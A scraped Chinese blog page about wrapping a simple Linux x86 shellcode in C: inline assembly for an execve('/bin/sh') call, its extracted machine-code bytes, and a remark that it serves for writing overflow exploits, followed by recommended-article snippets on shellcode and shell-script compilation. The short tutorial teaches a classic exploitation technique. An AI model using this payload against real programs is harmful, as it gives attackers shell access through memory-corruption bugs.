关于一个简单shellcode封装成C语言的形式

最新推荐文章于 2023-12-13 13:46:09 发布
最新推荐文章于 2023-12-13 13:46:09 发布
阅读量581 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 语言 c 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/instruder/article/details/4483757

void main() {
__asm__("
jmp 0x18                # 2 bytes
popl %esi               # 1 byte
movl %esi,0x8(%esi)       # 3 bytes
xorl %eax,%eax          # 2 bytes
movb %eax,0x7(%esi)    # 3 bytes
movl %eax,0xc(%esi)      # 3 bytes
movb $0xb,%al         # 2 bytes
movl %esi,%ebx         # 2 bytes
leal 0x8(%esi),%ecx       # 3 bytes
leal 0xc(%esi),%edx       # 3 bytes
int $0x80              # 2 bytes
call -0x2d               # 5 bytes
.string /"/bin/sh/"          # 8 bytes
");
}
------------------------------------------------------------
经过编译后,用gdb得到这段汇编语言的机器代码为:
/xeb/x18/x5e/x89/x76/x08/x31/xc0/x88/x46/x07/x89/x46/x0c/xb0/x0b
/x89/xf3/x8d/x4e/x08/x8d/x56/x0c/xcd/x80/xe8/xec/xff/xff/xff/bin/sh

接着我们就可以利用这段代码编写溢出程序了。

instruder
关注
第10章 shellcode实战:16 实战:文件shellcode
李小咖·网安技术库
05-14 2182
我最近做了一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。
27、C语言编程深入探索
最新发布
white的博客
07-15 13
本文深入探讨了C语言编程的核心主题,包括指针类型换与位级重解释、空指针与野指针、存储时长(自动、静态、分配)、整数栈的动态内存实现、字符串处理及其潜在问题(如缓冲区溢出)、预处理器的使用等。文章还详细分析了C语言在安全性和灵活性之间的权衡,以及与其他现代语言的对比。最后提供了相关练习题及解答思路,并总结了C语言的重要性及其未来发展。
通过shell脚本生C代码例程
Jalen_king
08-16 1984
通过shell脚本生C代码例程: #!/bin/sh target=$1 BUILDER_VERSION_BRANCH=${VERSION_BRANCH} BUILDER_VERSION_MAJOR=${VERSION_MAJOR} BUILDER_VERSION_MINOR=${VERSION_MINOR} BUILDER_VERSION_EXTRA=${VERSION_EXT
shellcode反编译c语言代码的两种方式
weixin_43090100的博客
10-04 5954
下述所用的工具包含:IDA pro,Dev C++ 以下介绍两种方法 开始操作之前,需要知道的几个小前提 一个可执行文件包含多个字段(field), text段是程序代码段,包含着要运行程序的指令。shellcode像你说的,汇编语言很容易,因为shellcode本质就是一段恶意的机器码——cpu指令 逆向工程(reverse engineering)常用到的分析工具大体有两个:olly...
Linux 将Shell脚本换为C
热门推荐
优快云
05-19 1万+
shc 是一个用于将Shell脚本编译可执行二进制文件的实用程序。它允许您将Shell脚本换为二进制形式,从而隐藏脚本的源代码,并增加一些安全性。当您编译一个Shell脚本时,它将创建一个二进制文件,可以像运行任何其他可执行文件一样运行它。
c语言实现shellcode换工具
17岁boy的博客
07-12 2972
shellcode是一种小型内嵌代码,一般用于入侵,和修补漏洞的。 这种代码是非常简洁的而且跨平台性能高,因为后面博主要写关于shellcode的文章,所以今天这里给大家介绍如何使用c语言一个能够实现汇编到机器码的换程序 首先你需要一个汇编解释器: 这里博主已经上传到网盘: 链接:https://pan.baidu.com/s/1TuF1OeBJzAwcwVrlR4d4BQ​​​​​​...
脚本语言换为C代码的工具
nbczc的博客
12-01 1062
shellc除了解决上述这两工具存在的问题外,还增加了代码混淆和随机生有效字符位置计算函数增加反汇编逆向复杂度。环境中进行了测试并具有实际应用。建议对编译后的程序进行全面测试,以防止生产故障。, 以删除可执行程序中的符号表,增加了反汇编和逆向工程的难度。本人试用了可以将shell脚本编译可执行程序的工具。对于生产环境中使用的程序,建议在编译时添加参数。等专业工具对生后的C代码进一步进行混淆。该程序适用于可定义函数语法的shell,如。如果需要进一步增加逆向难度,还可使用。
shellcode基础-Linux木马构造流程
weixin_43988746的博客
12-13 1143
编写Linux木马流程
C如何通过createthread传递shellcode多个参数
09-10
下面是一个使用结构体封装多个参数,并通过CreateThread传递给线程函数的示例: 首先,定义一个结构体来保存你需要传递的参数: ```c typedef struct { int param1; char* param2; void* param3; // 其他你...
luajit利用ffi结合C语言实现面向对象的封装
Gnorth的专栏
06-12 2898
luajit中,利用ffi可以嵌入C,目前luajit的最新版是2.0.4,在这之前的版本我还不清楚这个扩展库具体怎么样,不过在2.04中,真的很爽。  既然是嵌入C代码,那么要说让lua支持面向对象,不如说是让C语言模拟面向对象编程,然后让luajit的ffi嵌入。要文字彻底来描述清楚这个问题,我的表达能力很有限,说不清楚,所以直接用代码来说吧。//C++ class foo_type{ p
一些 shell 命令的C语言简要实现
m0_47696151的博客
08-08 497
uname 打印系统信息 $ uname Linux c 语言实现
Linux中将shell脚本打包为可执行文件
bingyu的博客
10-09 7485
Linux中将shell脚本打包为可执行文件 在实际运行中,将一个写好的脚本部署到生产系统上,但碍于保密或者密码泄露问题,需要将脚本打包封装。现在总结两种脚本打包方法,第二种shc实用性更加强。 1、gzexe加密 gzexe命令即可隐藏shell源码,这个命令是系统自带的gzexe程序。在运用中, gzexe script.sh会把原来没有加密的文件备份为 script.sh~ ,同时 script.sh 即被变加密文件。 gzexe -d script.sh会解密还原脚本,所以只能够满足一般的加密
bash 换为C代码
weixin_30432179的博客
05-19 443
bash 换为C代码,并编译为可执行文件 [root@localhost ~]# wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.9.tgz [root@localhost ~]# tar xvfz shc-3.8.9.tgz [root@localhost ~]# cd shc-3.8.9 [root@localhost shc...
堆栈溢出系列讲座
weixin_30537391的博客
08-07 135
堆栈溢出系列讲座 序言: 通过堆栈溢出来获得root权限是目前使用的相当普遍的一项黑客技术。事实上这是一个黑客在系统本地已经拥有了一个基本账号后的首选攻击方式。 他也被广泛应用于远程攻击。通过对daemon进程的堆栈溢出来实现远程获得rootshell的技术,已经被很多实例实现。 在windows系统中,同样存在着堆栈溢出的问题。而且,随着internet的普及, win系列平台上的intern...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9843
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 4025
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7414
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
用C语言实现一个通用的shellcode
12-30
### 编写通用Shellcode的方法 编写通用的shellcode是一项复杂而敏感的任务,通常用于安全研究和漏洞利用开发。...请注意这只是一个教学性质的例子,实际应用中的shellcode往往更加隐蔽且具备更多功能性扩展[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值